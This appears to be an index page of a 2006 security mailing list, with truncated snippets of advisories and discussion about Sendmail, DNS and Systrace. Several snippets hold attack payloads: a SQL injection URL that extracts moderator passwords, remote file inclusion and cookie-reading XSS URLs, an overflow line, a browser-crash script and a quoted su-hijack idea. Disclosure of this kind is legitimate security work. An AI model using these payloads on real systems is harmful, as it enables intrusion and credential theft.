-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

HPSBUX02108 SSRT061133 rev.1 - HP-UX running Sendmail, Remote
Execution
of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted
upon as soon
as possible.

Release Date: 2006-03-25
Last Updated: 2006-03-25

Potential Secu

[ more ]  [ reply ]

Hi
Vulnerable: SaphpLesson2.0
http://www.Arabless.com

Exploit :
http://Example.com/lesson/print.php?lessid=[SQL]

Example :
For Name & Passowrd
http://Example.com/lesson/print.php?lessid=-1%20union%20select%20null,nu
ll,null,ModName,null,ModPassword,null,ModPassword,null,ModPassword,null,
null,null,n

[ more ]  [ reply ]

[+]UBBThreads
[-]Founded By Moroccan Security Team
[+]we are [DaBDouB-MoSiKaR,simo64,ki11er,Dr.E-Vil,|ucifier]
[+]special 10x: to all friends SnIpEr_SA,Crash_OvEr_rIdE king-hacker,CiM-TeaM,ameer,Dranzelz,Esp!onLeRaVaGe and www.lezr.com
[+]Solution:Upgrade to a version 6.0.3
[-]exemple:http://[targe

[ more ]  [ reply ]

MaddHatter wrote:
>>We discussed recursive DNS servers before (servers which allow to query
>>anything - including what they are not authoritative for, through them).
>>...
>>One of the problems is obviously the spoofing. ...
>
>
> Maybe I'm misunderstanding the problem here (but I don't think so)

[ more ]  [ reply ]

> We discussed recursive DNS servers before (servers which allow to query
> anything - including what they are not authoritative for, through them).
> ...
> One of the problems is obviously the spoofing. ...

Maybe I'm misunderstanding the problem here (but I don't think so). It
seems to be the iss

[ more ]  [ reply ]

Theo,

>> ISS explained it to us and
>> told us that they had managed to craft an exploit in their lab, but
>> frankly we don't see how it can be practical.
>
> I know the guy who exploited it. He's better than you think he is.

I'm sorry, I was not trying to imply in any way that Mark was blowing

[ more ]  [ reply ]

You got it wrong the over-flow hapen's here

print $socket "user " . "A" x 10240 . "\r\n";

print $socket "user " . "A" x 21048 . "\r\n";

and there are more i put this right and re released this exploit.

[ more ]  [ reply ]

>So you are basically saying open source free software can't be trusted to
>hold high standards or be reliable or secure if I don't pay for it?

No, he is saying that *their* high standards are not necesarily *your*
high standards. And that *they* get to define the rules with which they
publish th

[ more ]  [ reply ]

PoC can be optimized:

------------[ PoC code ]--------------
<script>
for(s='<a onclick=',i=0;i<8||(document.write(s+'>'));i++)s+=s;
</script>
------------[ 83 bytes ]--------------

[ more ]  [ reply ]

On Fri, 24 Mar 2006, Gadi Evron wrote:
> On Thu, 23 Mar 2006, Claus Assmann wrote:
>>> It took Sendmail a mounth to fix this. A mounth.
>>
>> No. It took sendmail a week to fix this. The rest of the time was
>> used to coordinate the release with all the involved vendors etc.
>
> There are a few ch

[ more ]  [ reply ]

New eVuln Advisory:
DSDownload Multiple SQL Injection Vulnerabilities
http://evuln.com/vulns/99/summary.html

--------------------Summary----------------
eVuln ID: EV0099
CVE: CVE-2006-1232
Software: DSDownload
Sowtware's Web Site: http://dsportal.uw.hu/
Versions: 1.0
Critical Level: Moderate
Type:

[ more ]  [ reply ]

New eVuln Advisory:
DSCounter 'X-Forwarded-For' SQL Injection Vulnerability
http://evuln.com/vulns/98/summary.html

--------------------Summary----------------
eVuln ID: EV0098
CVE: CVE-2006-1234
Software: DSCounter
Sowtware's Web Site: http://dsportal.uw.hu/
Versions: 1.2
Critical Level: Moderate
T

[ more ]  [ reply ]

It's been a while since my last post to Bugtraq and it's been over
three years since I first announced Systrace. Here is:

Systrace 1.6: Phoenix Release
---------------------------------------

You all know that Systrace ships by default with OpenBSD and NetBSD.
However, Linux adoption has been hi

[ more ]  [ reply ]

Theo de Raadt wrote:
>>Sendmail has been an important part of the Internet infrastructure and
>>has gained a lot of honour and respect. Many people use this piece of
>>software and a lot of distributors/vendors are proliferating this
>>software. They do deserve better, as do the users who decide t

[ more ]  [ reply ]

Theo de Raadt wrote:
>>Sendmail has been an important part of the Internet infrastructure and
>>has gained a lot of honour and respect. Many people use this piece of
>>software and a lot of distributors/vendors are proliferating this
>>software. They do deserve better, as do the users who decide

[ more ]  [ reply ]

Theo de Raadt wrote:
> > You would probably expect me to the be last person to say
> > that Sendmail is perfectly within their rights. I have
> > had a lot of problems with what they are doing.
> >
> > But what did you pay for Sendmail? Was it a dollar, or was
> > it more? Let me guess. It wa

[ more ]  [ reply ]

John Richard Moser wrote:

> Here is a simple hack to break sudo and su to get free root. Add this
> to ~/.bashrc and fill in the following blanks:
>
> * ~/.root_kit/rk_su
> Your hacked su to give root on su --now-dammit
> * ~/.root_kit/silent_install_root_kit
> Your script to silently install rk_

[ more ]  [ reply ]

On Thu, 23 Mar 2006, Claus Assmann wrote:
> Ask ISS about the exploit. It definitely is a programming bug,
> just read the man page for setjmp() on an OpenBSD system.

I did, ISS indeed enlightened me. Didn't I ask for just that?
:)

> > It took Sendmail a mounth to fix this. A mounth.
>
> No. It t

[ more ]  [ reply ]

On Thu, 23 Mar 2006, Theo de Raadt wrote:
> > Sendmail is, as we know, the most used daemon for SMTP in the world. This
> > is an International Infrastructure vulnerability and should have been
> > treated that way. It wasn't. It was handled not only poorly, but
> > irresponsibly.
>
> You would pro

[ more ]  [ reply ]

> Sendmail has been an important part of the Internet infrastructure and
> has gained a lot of honour and respect. Many people use this piece of
> software and a lot of distributors/vendors are proliferating this
> software. They do deserve better, as do the users who decide to trust
> this vendor

[ more ]  [ reply ]

On Thu, 23 Mar 2006, Dragos Ruiu wrote:
> On March 23, 2006 01:41 am, Gadi Evron wrote:
> > Here's what ISS releasing the Race Condition vulnerability has to say:
> > http://xforce.iss.net/xforce/alerts/id/216
> > They say it's a remote code execution. They say it's a race condition. No
> > real dat

[ more ]  [ reply ]

Probably you were pointing to the following vendor: FrSIRT, not FrCIRT.

Regards,
Juha-Matti

> Symantec Deepsight Alert Services
> SecurityMob
> FrCIRT
> iAlert Web
> TraceAlert
> SecurityTracker
> Cybertrust Vulnerability/Threat Management
> Vulnerability Tracking Service
> X-Force Threat Analysi

[ more ]  [ reply ]

On Fri, 24 Mar 2006 Valdis.Kletnieks (at) vt (dot) edu [email concealed] wrote:
> On Thu, 23 Mar 2006 03:59:20 CST, Gadi Evron said:
> > Oh, sorry for not mentioning earlier -
> > Operators that want to patch Sendmail, I'd suggest doing it soon. Now we
> > not only do we face risk to our mail servers, but rather trusting other

[ more ]  [ reply ]

> Ask ISS about the exploit. It definitely is a programming bug,
> just read the man page for setjmp() on an OpenBSD system.

Claus is talking about this particular piece of text which we added to
our setjmp(3) manual page in late 2001:

CAVEATS
[...]

Use of longjmp() or siglongjmp() fro

[ more ]  [ reply ]

On Fri, Mar 24, 2006 at 03:26:12AM -0800, neeko (at) feelingsinister (dot) net [email concealed] wrote:
> Hello everyone.
>
> Doesn't the included text from the advisory really make it sound more like a
> problem with their system for managing games?

Hello, this is accurate.

> It doesn't point out any flaw
> in nethack in

[ more ]  [ reply ]

On Thu, 23 Mar 2006, Eric Allman wrote:

<snip mostly relevant good replies by Mr. Allman>

> Talk to the vendors. I've seen quite a few of their advisories come
> by.

After or before it hit the news? You may be able to alert vendors, but
the problem with critical infrastructure is that is widely

[ more ]  [ reply ]

On Fri, 2006-03-24 at 03:26 -0800, neeko (at) feelingsinister (dot) net [email concealed] wrote:
> Doesn't the included text from the advisory really make it sound more like a
> problem with their system for managing games? It doesn't point out any flaw
> in nethack in general, just behavior that's unexpected/unwanted/uncont

[ more ]  [ reply ]

Website : http://www.vihor.de

I.Remote Exucete :

Vulnerable :

http://www.site.com/[path]/index.php?page=evilcode.txt?&cmd=id

II. Cross Attack

http://www.site.com/[path]/index.php?page=<script>alert(document.cookie)
</script>

http://www.site.com/[path]/index.php?page=<script>alert(Patriotic Hac

[ more ]  [ reply ]

Theo de Raadt wrote:
> > Sendmail is, as we know, the most used daemon for SMTP in the world. This
> > is an International Infrastructure vulnerability and should have been
> > treated that way. It wasn't. It was handled not only poorly, but
> > irresponsibly.

The documentation is distressingly vag

[ more ]  [ reply ]

Website : http://www.christian-heffner.de

Version : 1.07

I.

<?php

$filename="index.php";

require_once 'vlib/vlibTemplate.php';

$tmpl = new vlibTemplate('tmpl/std/index.tpl');

require_once 'config/db_config.php';

require_once 'config/pcfunctions.php';

Ucuyor.... :) lol

II. Vulnerabl

[ more ]  [ reply ]